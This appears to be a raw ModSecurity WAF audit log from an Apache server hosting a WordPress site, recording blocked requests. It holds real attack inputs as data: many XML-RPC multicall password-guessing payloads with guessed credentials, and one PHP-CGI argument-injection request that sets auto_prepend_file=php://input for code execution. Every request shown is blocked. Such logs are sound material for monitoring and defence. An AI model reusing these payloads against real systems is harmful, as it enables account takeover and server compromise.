--ccb35411-E-- --ccb35411-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 62.146.234.58 (1+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749099636370620 3274 (- - -) Stopwatch2: 1749099636370620 3274; combined=2347, p1=267, p2=1954, p3=0, p4=0, p5=74, sr=56, sw=52, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ccb35411-Z-- --98561101-A-- [05/Jun/2025:12:01:10 +0700] aEEklirHpfaS2Cuwh8XT8gAAAEQ 103.236.140.4 35020 103.236.140.4 8181 --98561101-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 197.242.157.213 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 197.242.157.213 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --98561101-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehsoleh2022! --98561101-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --98561101-E-- --98561101-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 197.242.157.213 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749099670883587 4762 (- - -) Stopwatch2: 1749099670883587 4762; combined=3643, p1=393, p2=3089, p3=0, p4=0, p5=94, sr=79, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --98561101-Z-- --4556d215-A-- [05/Jun/2025:12:02:26 +0700] aEEk4irHpfaS2Cuwh8XUAAAAAFM 103.236.140.4 35054 103.236.140.4 8181 --4556d215-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 197.242.157.213 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 197.242.157.213 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --4556d215-C-- system.multicallmethodNamewp.getUsersBlogsparamsusernamePassword --4556d215-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4556d215-E-- --4556d215-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 197.242.157.213 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749099746639088 5875 (- - -) Stopwatch2: 1749099746639088 5875; combined=4198, p1=535, p2=3490, p3=0, p4=0, p5=102, sr=96, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4556d215-Z-- --513a180c-A-- [05/Jun/2025:12:03:04 +0700] aEElCFwdJdhOudw5hdzO0gAAAIw 103.236.140.4 35092 103.236.140.4 8181 --513a180c-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 178.62.24.23 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 178.62.24.23 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --513a180c-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehsoleh99 --513a180c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --513a180c-E-- --513a180c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 178.62.24.23 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749099784051797 33436 (- - -) Stopwatch2: 1749099784051797 33436; combined=60467, p1=439, p2=2568, p3=0, p4=0, p5=28744, sr=70, sw=111, l=0, gc=28605 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --513a180c-Z-- --fcab7b6a-A-- [05/Jun/2025:12:03:25 +0700] aEElHSrHpfaS2Cuwh8XUDAAAAEI 103.236.140.4 35110 103.236.140.4 8181 --fcab7b6a-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 213.231.7.92 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 213.231.7.92 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --fcab7b6a-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminadminadmin --fcab7b6a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fcab7b6a-E-- --fcab7b6a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 213.231.7.92 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749099805069013 5679 (- - -) Stopwatch2: 1749099805069013 5679; combined=4016, p1=540, p2=3310, p3=0, p4=0, p5=98, sr=103, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fcab7b6a-Z-- --feea7c7e-A-- [05/Jun/2025:12:03:26 +0700] aEElHn-K7ToMdu-YSIIkTQAAABg 103.236.140.4 35112 103.236.140.4 8181 --feea7c7e-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 43.224.126.115 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 43.224.126.115 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --feea7c7e-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminantix@2022 --feea7c7e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --feea7c7e-E-- --feea7c7e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 43.224.126.115 (1+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749099806125699 4668 (- - -) Stopwatch2: 1749099806125699 4668; combined=3413, p1=423, p2=2839, p3=0, p4=0, p5=88, sr=87, sw=63, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --feea7c7e-Z-- --f25ab641-A-- [05/Jun/2025:12:05:15 +0700] aEEli1wdJdhOudw5hdzO2QAAAJM 103.236.140.4 35196 103.236.140.4 8181 --f25ab641-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 77.222.57.100 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 77.222.57.100 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --f25ab641-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminadmin2017 --f25ab641-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f25ab641-E-- --f25ab641-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 77.222.57.100 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749099915435993 5250 (- - -) Stopwatch2: 1749099915435993 5250; combined=3901, p1=468, p2=3263, p3=0, p4=0, p5=100, sr=109, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f25ab641-Z-- --0fd72a2b-A-- [05/Jun/2025:12:06:22 +0700] aEElzlwdJdhOudw5hdzO3QAAAJg 103.236.140.4 35222 103.236.140.4 8181 --0fd72a2b-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 14.225.216.240 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 14.225.216.240 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --0fd72a2b-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin2017 --0fd72a2b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0fd72a2b-E-- --0fd72a2b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.225.216.240 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749099982497895 5096 (- - -) Stopwatch2: 1749099982497895 5096; combined=3819, p1=422, p2=3222, p3=0, p4=0, p5=105, sr=82, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0fd72a2b-Z-- --2d6c3508-A-- [05/Jun/2025:12:06:56 +0700] aEEl8Oth7G2xELALzPYgqQAAAM0 103.236.140.4 35252 103.236.140.4 8181 --2d6c3508-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 213.231.7.92 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 213.231.7.92 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --2d6c3508-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehsoleh@789 --2d6c3508-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2d6c3508-E-- --2d6c3508-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 213.231.7.92 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749100016352752 4778 (- - -) Stopwatch2: 1749100016352752 4778; combined=3637, p1=400, p2=3069, p3=0, p4=0, p5=98, sr=83, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2d6c3508-Z-- --09f41321-A-- [05/Jun/2025:12:06:56 +0700] aEEl8Oth7G2xELALzPYgqwAAANI 103.236.140.4 35256 103.236.140.4 8181 --09f41321-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.137.136 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.137.136 X-Forwarded-Proto: http Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* --09f41321-C-- --09f41321-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --09f41321-E-- --09f41321-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749100016931378 2662 (- - -) Stopwatch2: 1749100016931378 2662; combined=1680, p1=354, p2=1298, p3=0, p4=0, p5=28, sr=73, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --09f41321-Z-- --5a21ed73-A-- [05/Jun/2025:12:08:38 +0700] aEEmVuth7G2xELALzPYgswAAAMI 103.236.140.4 35282 103.236.140.4 8181 --5a21ed73-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 103.42.58.162 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 103.42.58.162 X-Forwarded-Proto: https Connection: close Content-Length: 479 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --5a21ed73-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehsoleh2 --5a21ed73-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5a21ed73-E-- --5a21ed73-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 103.42.58.162 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749100118489175 5822 (- - -) Stopwatch2: 1749100118489175 5822; combined=4150, p1=495, p2=3489, p3=0, p4=0, p5=98, sr=91, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5a21ed73-Z-- --bc501073-A-- [05/Jun/2025:12:08:47 +0700] aEEmX-th7G2xELALzPYgtAAAAMM 103.236.140.4 35284 103.236.140.4 8181 --bc501073-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 143.244.185.159 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 143.244.185.159 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --bc501073-C-- system.multicallmethodNamewp.getUsersBlogsparamskpopvisualsantix --bc501073-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bc501073-E-- --bc501073-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 143.244.185.159 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749100127954543 5358 (- - -) Stopwatch2: 1749100127954543 5358; combined=3922, p1=462, p2=3293, p3=0, p4=0, p5=99, sr=85, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bc501073-Z-- --0515f977-A-- [05/Jun/2025:12:08:59 +0700] aEEma1wdJdhOudw5hdzO5gAAAIg 103.236.140.4 35298 103.236.140.4 8181 --0515f977-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 178.62.24.23 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 178.62.24.23 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --0515f977-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin2014 --0515f977-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0515f977-E-- --0515f977-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 178.62.24.23 (1+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749100139481902 4607 (- - -) Stopwatch2: 1749100139481902 4607; combined=3583, p1=407, p2=3006, p3=0, p4=0, p5=99, sr=82, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0515f977-Z-- --ed791c0f-A-- [05/Jun/2025:12:09:01 +0700] aEEmbeth7G2xELALzPYguQAAAMc 103.236.140.4 35300 103.236.140.4 8181 --ed791c0f-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 188.225.21.131 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 188.225.21.131 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --ed791c0f-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehsoleh00 --ed791c0f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ed791c0f-E-- --ed791c0f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 188.225.21.131 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749100141403706 6436 (- - -) Stopwatch2: 1749100141403706 6436; combined=4354, p1=529, p2=3663, p3=0, p4=0, p5=99, sr=89, sw=63, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ed791c0f-Z-- --2575d742-A-- [05/Jun/2025:12:09:47 +0700] aEEmm-th7G2xELALzPYgwQAAAM4 103.236.140.4 35318 103.236.140.4 8181 --2575d742-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 14.225.216.240 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 14.225.216.240 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --2575d742-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin@1 --2575d742-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2575d742-E-- --2575d742-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.225.216.240 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749100187922361 4542 (- - -) Stopwatch2: 1749100187922361 4542; combined=3545, p1=366, p2=2990, p3=0, p4=0, p5=108, sr=79, sw=81, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2575d742-Z-- --954da211-A-- [05/Jun/2025:12:10:29 +0700] aEEmxeth7G2xELALzPYgxwAAANY 103.236.140.4 35338 103.236.140.4 8181 --954da211-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 103.42.58.162 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 103.42.58.162 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --954da211-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminadmin!23 --954da211-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --954da211-E-- --954da211-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 103.42.58.162 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749100229163185 5376 (- - -) Stopwatch2: 1749100229163185 5376; combined=3874, p1=464, p2=3237, p3=0, p4=0, p5=101, sr=88, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --954da211-Z-- --d3c7db31-A-- [05/Jun/2025:12:10:55 +0700] aEEm3-th7G2xELALzPYgywAAAMM 103.236.140.4 35346 103.236.140.4 8181 --d3c7db31-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 197.242.157.213 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 197.242.157.213 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 